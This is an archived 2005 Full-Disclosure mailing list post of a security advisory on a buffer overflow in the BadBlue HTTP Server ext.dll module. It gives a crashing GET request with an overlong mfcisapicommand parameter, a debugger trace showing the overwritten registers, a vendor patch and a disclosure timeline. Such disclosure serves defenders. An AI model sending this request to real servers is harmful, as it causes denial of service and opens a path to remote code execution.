[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
From: Andres Tarasco <atarasco () sia ! es>
Date: 2005-02-26 17:30:16
Message-ID: F224FBA669BC42488E34CF105B4DD54D03025085 () intramail
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
overflow
* Release DAte:
February 26, 2005
* Vendor:
Working Resources Inc. http://www.badblue.com
* Versions Affected:
Confirmed under Badblue HTTP Server v2.55
* Severity:
Critical (Remote Code execution)
* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"
* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, a module that handles
badblue http Requests. This buffer overflow triggers when an special crafted
HTTP Request is created.
Buffer overflow in EXT.DLL is triggered when a malicious http request that
contains a long mfcisapicommand parameter, with more than 250 chars, is
submitted. Some registers are overwritten so its possible to execute code or
cause a denial of service shutting down the server. The Following request
can be used to crash the remote server.
GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx
Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
E:\BadBlue\PE\ext.dll -
ext!GetExtensionVersion+0x13f7:
10042004 8b3e mov edi,[esi]
ds:0023:41414141=????????
Succesfully exploitation of this flaw could allow remote code execution with
Administrator rigths.
* Solution:
Upgrade to the lastest available version. At this time, vendor provides
version v2.6 that is available to download at
http://www.badblue.com/bb98.exe
* Credits:
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability
* Disclosure Timeline:
December 2004 - Discovered
December 20, 2004 - Initial Vendor Notification
December 21, 2004 - Initial Vender Response
January 3, 2005 - Vendor Patch released (v2.60)
February 26, 2005 - Public Disclosure
[Attachment #5 (text/html)]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=US-ASCII">
<META NAME="Generator" CONTENT="MS Exchange Server version 5.5.2653.12">
<TITLE>Badblue HTTP Server, ext.dll buffer overflow</TITLE>
</HEAD>
<BODY>
<P><FONT SIZE=2>SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer \
overflow</FONT> </P>
<P><FONT SIZE=2>* Release DAte:</FONT>
<BR><FONT SIZE=2>February 26, 2005</FONT>
</P>
<P><FONT SIZE=2>* Vendor: </FONT>
<BR><FONT SIZE=2>Working Resources Inc. <A HREF="http://www.badblue.com" \
TARGET="_blank">http://www.badblue.com</A></FONT> </P>
<P><FONT SIZE=2>* Versions Affected:</FONT>
<BR><FONT SIZE=2>Confirmed under Badblue HTTP Server v2.55</FONT>
</P>
<P><FONT SIZE=2>* Severity: </FONT>
<BR><FONT SIZE=2>Critical (Remote Code execution)</FONT>
</P>
<P><FONT SIZE=2>* Summary:</FONT>
<BR><FONT SIZE=2>"BadBlue is not only a server, it's a complete file sharing system that \
is simply easier and faster to use than anything else. Why? Because BadBlue lets you use a tool \
you already know well: a web browser."</FONT></P>
<P><FONT SIZE=2>"In seconds, you can turn your PC into a powerful web server. You can \
easily share photos, music, videos, and much more. With its simple menu-driven interface and \
pop-up wizards to guide you through setup, there's no faster way to share \
files"</FONT></P> <BR>
<P><FONT SIZE=2>* Technical Details:</FONT>
<BR><FONT SIZE=2>SIA has discovered a buffer overflow in EXT.DLL, a module that handles badblue \
http Requests. This buffer overflow triggers when an special crafted HTTP Request is \
created.</FONT></P>
<P><FONT SIZE=2>Buffer overflow in EXT.DLL is triggered when a malicious http request that \
contains a long mfcisapicommand parameter, with more than 250 chars, is submitted. Some \
registers are overwritten so its possible to execute code or cause a denial of service shutting \
down the server. The Following request can be used to crash the remote server.</FONT></P>
<P><FONT SIZE=2>GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx</FONT>
</P>
<P><FONT SIZE=2>Windbg trace:</FONT>
<BR><FONT SIZE=2>(360.21c): Access violation - code c0000005 (first chance)</FONT>
<BR><FONT SIZE=2>First chance exceptions are reported before any exception handling.</FONT>
<BR><FONT SIZE=2>This exception may be expected and handled.</FONT>
<BR><FONT SIZE=2>eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 \
edi=77e2b495</FONT> <BR><FONT SIZE=2>eip=10042004 esp=026bd8f4 ebp=026bdbe0 \
iopl=0 nv up ei pl nz na po nc</FONT> <BR><FONT \
SIZE=2>cs=001b ss=0023 ds=0023 es=0023 fs=0038 \
gs=0000 \
efl=00010206</FONT> <BR><FONT SIZE=2>*** WARNING: Unable to verify checksum for \
E:\BadBlue\PE\ext.dll</FONT> <BR><FONT SIZE=2>*** ERROR: Symbol file could not be found. \
Defaulted to export symbols for E:\BadBlue\PE\ext.dll - </FONT> <BR><FONT \
SIZE=2>ext!GetExtensionVersion+0x13f7:</FONT> <BR><FONT SIZE=2>10042004 \
8b3e \
mov edi,[esi] \
ds:0023:41414141=????????</FONT> </P>
<P><FONT SIZE=2>Succesfully exploitation of this flaw could allow remote code execution with \
Administrator rigths.</FONT> </P>
<BR>
<P><FONT SIZE=2>* Solution: </FONT>
<BR><FONT SIZE=2>Upgrade to the lastest available version. At this time, vendor provides \
version v2.6 that is available to download at <A HREF="http://www.badblue.com/bb98.exe" \
TARGET="_blank">http://www.badblue.com/bb98.exe</A></FONT></P>
<P><FONT SIZE=2>* Credits:</FONT>
<BR><FONT SIZE=2>Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability</FONT>
</P>
<P><FONT SIZE=2>* Disclosure Timeline:</FONT>
<BR><FONT SIZE=2>December 2004 - Discovered</FONT>
<BR><FONT SIZE=2>December 20, 2004 - Initial Vendor Notification </FONT>
<BR><FONT SIZE=2>December 21, 2004 - Initial Vender Response</FONT>
<BR><FONT SIZE=2>January 3, 2005 - Vendor Patch released (v2.60)</FONT>
<BR><FONT SIZE=2>February 26, 2005 - Public Disclosure</FONT>
</P>
</BODY>
</HTML>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic